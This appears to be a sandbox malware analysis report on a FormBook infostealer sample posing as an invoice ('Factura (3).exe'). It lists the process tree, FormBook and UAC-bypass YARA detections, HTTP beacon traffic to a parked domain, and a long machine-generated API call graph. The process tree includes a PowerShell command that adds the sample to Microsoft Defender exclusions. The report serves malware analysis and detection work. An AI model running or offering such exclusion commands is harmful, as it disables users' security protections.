                                                     36 | 192.168.2.9 | 49750 | 199.59.243.225 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:21:51.276734114 CEST | 474 | OUT | GET /mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                     May 16, 2024 17:21:52.385963917 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:51 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1466
                                                    x-request-id: 34afca40-cbda-4b10-8ede-7decc88c0ae7
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XqV10ngUDRmZwwc3zAw7Z375kFcYAARhN9c/OVoenMGO1925Rm4FyvQ++dEadD7G2lhBkKn3H4PJkCFPd8JN9A==
                                                    set-cookie: parking_session=34afca40-cbda-4b10-8ede-7decc88c0ae7; expires=Thu, 16 May 2024 15:36:52 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 71 56 31 30 6e 67 55 44 52 6d 5a 77 77 63 33 7a 41 77 37 5a 33 37 35 6b 46 63 59 41 41 52 68 4e 39 63 2f 4f 56 6f 65 6e 4d 47 4f 31 39 32 35 52 6d 34 46 79 76 51 2b 2b 64 45 61 64 44 37 47 32 6c 68 42 6b 4b 6e 33 48 34 50 4a 6b 43 46 50 64 38 4a 4e 39 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XqV10ngUDRmZwwc3zAw7Z375kFcYAARhN9c/OVoenMGO1925Rm4FyvQ++dEadD7G2lhBkKn3H4PJkCFPd8JN9A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                     May 16, 2024 17:21:52.390695095 CEST | 919 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzRhZmNhNDAtY2JkYS00YjEwLThlZGUtN2RlY2M4OGMwYWU3IiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                    Target ID:6
                                                    Start time:11:18:03
                                                    Start date:16/05/2024
                                                    Path:C:\Users\user\Desktop\Factura (3).exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\Factura (3).exe"
                                                    Imagebase:0x7ff7340d0000
                                                    File size:1'034'668 bytes
                                                    MD5 hash:367F6A9B9B00F860281FE3865A0D33F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:11:18:03
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:11:18:04
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                     Commandline:powershell.exe -EncodedCommand [TRUNCATED]
                                                    Imagebase:0x7ff760310000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:11:18:04
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
                                                    Imagebase:0x7ff760310000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\calc.exe
                                                    Wow64 process (32bit):
                                                    Commandline:"C:\Windows\System32\calc.exe"
                                                    Imagebase:
                                                    File size:27'648 bytes
                                                    MD5 hash:5DA8C98136D98DFEC4716EDD79C7145F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:14
                                                    Start time:11:18:17
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                    Imagebase:0x960000
                                                    File size:2'141'552 bytes
                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:11:18:18
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
                                                    Imagebase:0x7ff63b820000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:11:18:24
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe"
                                                    Imagebase:0x970000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:23
                                                    Start time:11:18:25
                                                    Start date:16/05/2024
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\chkdsk.exe"
                                                    Imagebase:0x890000
                                                    File size:23'040 bytes
                                                    MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:24
                                                    Start time:11:18:39
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe"
                                                    Imagebase:0x970000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:25
                                                    Start time:11:18:50
                                                    Start date:16/05/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff73feb0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:8.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.2%
                                                      Total number of Nodes:1438
                                                      Total number of Limit Nodes:36
_fread_nolock MultiByteToWideChar 19161->19162 19163 7ff7340fe8e6 19162->19163 19163->19159 19164 7ff7340fe8ea GetStringTypeW 19163->19164 19164->19159 19166 7ff7340f35fc TranslateName 47 API calls 19165->19166 19167 7ff7340fecb1 19166->19167 19173 7ff7340fe958 19167->19173 19172 7ff7340ff49d MultiByteToWideChar 19170->19172 19174 7ff7340fe999 ctype 19173->19174 19175 7ff7340ff494 _fread_nolock MultiByteToWideChar 19174->19175 19179 7ff7340fe9e3 19175->19179 19176 7ff7340fec61 19177 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19176->19177 19178 7ff7340fec6f 19177->19178 19178->19148 19179->19176 19180 7ff7340fb8f0 _fread_nolock 12 API calls 19179->19180 19181 7ff7340fea1b ctype 19179->19181 19192 7ff7340feb19 19179->19192 19180->19181 19183 7ff7340ff494 _fread_nolock MultiByteToWideChar 19181->19183 19181->19192 19182 7ff7340f80dc __free_lconv_mon 11 API calls 19182->19176 19184 7ff7340fea8e 19183->19184 19184->19192 19204 7ff7340f8824 19184->19204 19187 7ff7340fead9 19189 7ff7340f8824 __crtLCMapStringW 7 API calls 19187->19189 19187->19192 19188 7ff7340feb2a 19190 7ff7340fb8f0 _fread_nolock 12 API calls 19188->19190 19191 7ff7340febfc 19188->19191 19194 7ff7340feb48 ctype 19188->19194 19189->19192 19190->19194 19191->19192 19193 7ff7340f80dc __free_lconv_mon 11 API calls 19191->19193 19192->19176 19192->19182 19193->19192 19194->19192 19195 7ff7340f8824 __crtLCMapStringW 7 API calls 19194->19195 19196 7ff7340febc8 19195->19196 19196->19191 19197 7ff7340febfe 19196->19197 19198 7ff7340febe8 19196->19198 19200 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19197->19200 19212 7ff7340ff524 19198->19212 19201 7ff7340febf6 19200->19201 19201->19191 19202 7ff7340fec16 19201->19202 19202->19192 19203 7ff7340f80dc __free_lconv_mon 11 API calls 19202->19203 19203->19192 19215 7ff7340f81cc 19204->19215 19207 7ff7340f886a LCMapStringEx 19209 7ff7340f88fb 19207->19209 19208 7ff7340f88c9 19225 7ff7340f8910 19208->19225 19209->19187 19209->19188 19209->19192 19211 
7ff7340f88d3 LCMapStringW 19211->19209 19214 7ff7340ff548 WideCharToMultiByte 19212->19214 19216 7ff7340f8229 19215->19216 19223 7ff7340f8224 __vcrt_InitializeCriticalSectionEx 19215->19223 19216->19207 19216->19208 19217 7ff7340f8259 LoadLibraryW 19219 7ff7340f832e 19217->19219 19220 7ff7340f827e GetLastError 19217->19220 19218 7ff7340f834e GetProcAddress 19218->19216 19222 7ff7340f835f 19218->19222 19219->19218 19221 7ff7340f8345 FreeLibrary 19219->19221 19220->19223 19221->19218 19222->19216 19223->19216 19223->19217 19223->19218 19224 7ff7340f82b8 LoadLibraryExW 19223->19224 19224->19219 19224->19223 19226 7ff7340f81cc __crtLCMapStringW 5 API calls 19225->19226 19227 7ff7340f893e __crtLCMapStringW 19226->19227 19227->19211 19230 7ff7340e9535 19229->19230 19231 7ff7340e9927 19229->19231 19230->18744 19233 7ff7340edaf0 19231->19233 19234 7ff7340ed958 __vcrt_InitializeCriticalSectionEx 5 API calls 19233->19234 19235 7ff7340edb17 TlsFree 19234->19235 19238 7ff7340e7a9c 19237->19238 19254 7ff7340f5568 19238->19254 19240 7ff7340e7aa8 19260 7ff7340e770c 19240->19260 19242 7ff7340e7ac0 _RTC_Initialize 19252 7ff7340e7b15 19242->19252 19265 7ff7340e78bc 19242->19265 19243 7ff7340e7ef4 7 API calls 19244 7ff7340e7b41 19243->19244 19244->18601 19246 7ff7340e7ad5 19268 7ff7340f494c 19246->19268 19250 7ff7340e7aea 19251 7ff7340f5c70 47 API calls 19250->19251 19251->19252 19252->19243 19253 7ff7340e7b31 19252->19253 19253->18601 19255 7ff7340f5579 19254->19255 19256 7ff7340f5581 19255->19256 19257 7ff7340f3518 memcpy_s 11 API calls 19255->19257 19256->19240 19258 7ff7340f5590 19257->19258 19259 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19258->19259 19259->19256 19261 7ff7340e771d 19260->19261 19264 7ff7340e7722 __scrt_release_startup_lock 19260->19264 19262 7ff7340e7ef4 7 API calls 19261->19262 19261->19264 19263 7ff7340e7796 19262->19263 19264->19242 19301 7ff7340e7880 19265->19301 19267 7ff7340e78c5 19267->19246 19269 7ff7340e7ae1 19268->19269 19270 7ff7340f496c 
19268->19270 19269->19252 19300 7ff7340e8458 InitializeSListHead 19269->19300 19271 7ff7340f4974 19270->19271 19272 7ff7340f498a 19270->19272 19273 7ff7340f3518 memcpy_s 11 API calls 19271->19273 19274 7ff734100a50 68 API calls 19272->19274 19276 7ff7340f4979 19273->19276 19275 7ff7340f498f 19274->19275 19316 7ff734100134 GetModuleFileNameW 19275->19316 19278 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19276->19278 19278->19269 19284 7ff7340f4a01 19287 7ff7340f3518 memcpy_s 11 API calls 19284->19287 19285 7ff7340f4a19 19286 7ff7340f4724 47 API calls 19285->19286 19293 7ff7340f4a35 19286->19293 19288 7ff7340f4a06 19287->19288 19290 7ff7340f80dc __free_lconv_mon 11 API calls 19288->19290 19289 7ff7340f4a3b 19292 7ff7340f80dc __free_lconv_mon 11 API calls 19289->19292 19291 7ff7340f4a14 19290->19291 19291->19269 19292->19269 19293->19289 19294 7ff7340f4a80 19293->19294 19295 7ff7340f4a67 19293->19295 19298 7ff7340f80dc __free_lconv_mon 11 API calls 19294->19298 19296 7ff7340f80dc __free_lconv_mon 11 API calls 19295->19296 19297 7ff7340f4a70 19296->19297 19299 7ff7340f80dc __free_lconv_mon 11 API calls 19297->19299 19298->19289 19299->19291 19302 7ff7340e789a 19301->19302 19304 7ff7340e7893 19301->19304 19305 7ff7340f5250 19302->19305 19304->19267 19308 7ff7340f4e8c 19305->19308 19315 7ff7340f276c EnterCriticalSection 19308->19315 19317 7ff73410018d 19316->19317 19318 7ff734100179 GetLastError 19316->19318 19319 7ff7340f35fc TranslateName 47 API calls 19317->19319 19340 7ff7340f348c 19318->19340 19322 7ff7341001bb 19319->19322 19321 7ff734100186 19323 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19321->19323 19327 7ff7341001cc 19322->19327 19345 7ff7340f83e0 19322->19345 19326 7ff7340f49a6 19323->19326 19328 7ff7340f4724 19326->19328 19348 7ff7340f3dc8 19327->19348 19330 7ff7340f4762 19328->19330 19332 7ff7340f47ce 19330->19332 19362 7ff734100e00 19330->19362 19331 7ff7340f48bf 19334 7ff7340f48ec 19331->19334 19332->19331 19333 7ff734100e00 47 API calls 
19332->19333 19333->19332 19335 7ff7340f4904 19334->19335 19336 7ff7340f493c 19334->19336 19335->19336 19337 7ff7340f8064 _Getctype 11 API calls 19335->19337 19336->19284 19336->19285 19338 7ff7340f4932 19337->19338 19339 7ff7340f80dc __free_lconv_mon 11 API calls 19338->19339 19339->19336 19341 7ff7340f7e7c memcpy_s 11 API calls 19340->19341 19342 7ff7340f3499 __free_lconv_mon 19341->19342 19343 7ff7340f7e7c memcpy_s 11 API calls 19342->19343 19344 7ff7340f34bb 19343->19344 19344->19321 19346 7ff7340f81cc __crtLCMapStringW 5 API calls 19345->19346 19347 7ff7340f8400 19346->19347 19347->19327 19349 7ff7340f3e07 19348->19349 19353 7ff7340f3dec 19348->19353 19350 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19349->19350 19356 7ff7340f3e0c 19349->19356 19351 7ff7340f3e63 19350->19351 19354 7ff7340f3e6a GetLastError 19351->19354 19355 7ff7340f3e95 19351->19355 19351->19356 19352 7ff7340f3518 memcpy_s 11 API calls 19352->19353 19353->19321 19357 7ff7340f348c _fread_nolock 11 API calls 19354->19357 19358 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19355->19358 19356->19352 19356->19353 19359 7ff7340f3e77 19357->19359 19360 7ff7340f3ebc 19358->19360 19361 7ff7340f3518 memcpy_s 11 API calls 19359->19361 19360->19353 19360->19354 19361->19353 19363 7ff734100d8c 19362->19363 19364 7ff7340f35fc TranslateName 47 API calls 19363->19364 19365 7ff734100db0 19364->19365 19365->19330 19367 7ff7340f4aed 19366->19367 19376 7ff7340f4ae9 19366->19376 19368 7ff734100a50 68 API calls 19367->19368 19369 7ff7340f4af2 19368->19369 19389 7ff734100e14 GetEnvironmentStringsW 19369->19389 19372 7ff7340f4aff 19374 7ff7340f80dc __free_lconv_mon 11 API calls 19372->19374 19373 7ff7340f4b0b 19409 7ff7340f4b48 19373->19409 19374->19376 19376->18607 19381 7ff7340f4c9c 19376->19381 19378 7ff7340f80dc __free_lconv_mon 11 API calls 19379 7ff7340f4b32 19378->19379 19380 7ff7340f80dc __free_lconv_mon 11 API calls 19379->19380 19380->19376 19382 7ff7340f4cc5 19381->19382 19383 7ff7340f4cde 
19381->19383 19382->18607 19383->19382 19384 7ff7340f8064 _Getctype 11 API calls 19383->19384 19385 7ff7340f4d6e 19383->19385 19386 7ff7340ff524 WideCharToMultiByte _vswprintf_s_l 19383->19386 19388 7ff7340f80dc __free_lconv_mon 11 API calls 19383->19388 19384->19383 19387 7ff7340f80dc __free_lconv_mon 11 API calls 19385->19387 19386->19383 19387->19382 19388->19383 19390 7ff734100e44 19389->19390 19391 7ff7340f4af7 19389->19391 19392 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19390->19392 19391->19372 19391->19373 19393 7ff734100e95 19392->19393 19394 7ff734100e9c FreeEnvironmentStringsW 19393->19394 19395 7ff7340fb8f0 _fread_nolock 12 API calls 19393->19395 19394->19391 19396 7ff734100eaf 19395->19396 19397 7ff734100ec0 19396->19397 19398 7ff734100eb7 19396->19398 19400 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19397->19400 19399 7ff7340f80dc __free_lconv_mon 11 API calls 19398->19399 19401 7ff734100ebe 19399->19401 19402 7ff734100ee3 19400->19402 19401->19394 19403 7ff734100ef1 19402->19403 19404 7ff734100ee7 19402->19404 19406 7ff7340f80dc __free_lconv_mon 11 API calls 19403->19406 19405 7ff7340f80dc __free_lconv_mon 11 API calls 19404->19405 19407 7ff734100eef FreeEnvironmentStringsW 19405->19407 19406->19407 19407->19391 19410 7ff7340f4b6d 19409->19410 19411 7ff7340f8064 _Getctype 11 API calls 19410->19411 19423 7ff7340f4ba3 19411->19423 19412 7ff7340f4bab 19413 7ff7340f80dc __free_lconv_mon 11 API calls 19412->19413 19414 7ff7340f4b13 19413->19414 19414->19378 19415 7ff7340f4c1e 19416 7ff7340f80dc __free_lconv_mon 11 API calls 19415->19416 19416->19414 19417 7ff7340f8064 _Getctype 11 API calls 19417->19423 19418 7ff7340f4c0d 19437 7ff7340f4c58 19418->19437 19422 7ff7340f4c43 19425 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19422->19425 19423->19412 19423->19415 19423->19417 19423->19418 19423->19422 19426 7ff7340f80dc __free_lconv_mon 11 API calls 19423->19426 19428 7ff7340f7018 19423->19428 19424 7ff7340f80dc __free_lconv_mon 11 
API calls 19424->19412 19427 7ff7340f4c56 19425->19427 19426->19423 19430 7ff7340f7025 19428->19430 19432 7ff7340f702f 19428->19432 19429 7ff7340f3518 memcpy_s 11 API calls 19431 7ff7340f7036 19429->19431 19430->19432 19435 7ff7340f704a 19430->19435 19433 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19431->19433 19432->19429 19434 7ff7340f7042 19433->19434 19434->19423 19435->19434 19436 7ff7340f3518 memcpy_s 11 API calls 19435->19436 19436->19431 19438 7ff7340f4c5d 19437->19438 19439 7ff7340f4c15 19437->19439 19440 7ff7340f4c86 19438->19440 19442 7ff7340f80dc __free_lconv_mon 11 API calls 19438->19442 19439->19424 19441 7ff7340f80dc __free_lconv_mon 11 API calls 19440->19441 19441->19439 19442->19438 19444 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19443->19444 19445 7ff7340d9d09 19444->19445 19445->18611 19447 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19446->19447 19448 7ff7340d9da9 19447->19448 19448->18614 19450 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19449->19450 19451 7ff7340d9e44 19450->19451 19451->18617 19453 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19452->19453 19454 7ff7340d9ef3 19453->19454 19454->18620 19456 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19455->19456 19457 7ff7340d9fac 19456->19457 19457->18623 19459 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19458->19459 19460 7ff7340da044 19459->19460 19460->18626 19462 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19461->19462 19463 7ff7340da0ee 19462->19463 19463->18629 19556 7ff7340f267c GetSystemTimeAsFileTime 19464->19556 19467 7ff7340f24c4 19468 7ff7340f7d04 _Getctype 47 API calls 19467->19468 19469 7ff7340d96b6 19468->19469 19470 7ff7340f2498 19469->19470 19471 7ff7340f7d04 _Getctype 47 API calls 19470->19471 19472 7ff7340d96bb 19471->19472 19473 7ff7340da180 19472->19473 19474 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19473->19474 19475 7ff7340da1e2 19474->19475 19475->18639 19558 7ff7340dbbc0 19476->19558 19479 7ff7340da100 19480 7ff7340e7a40 
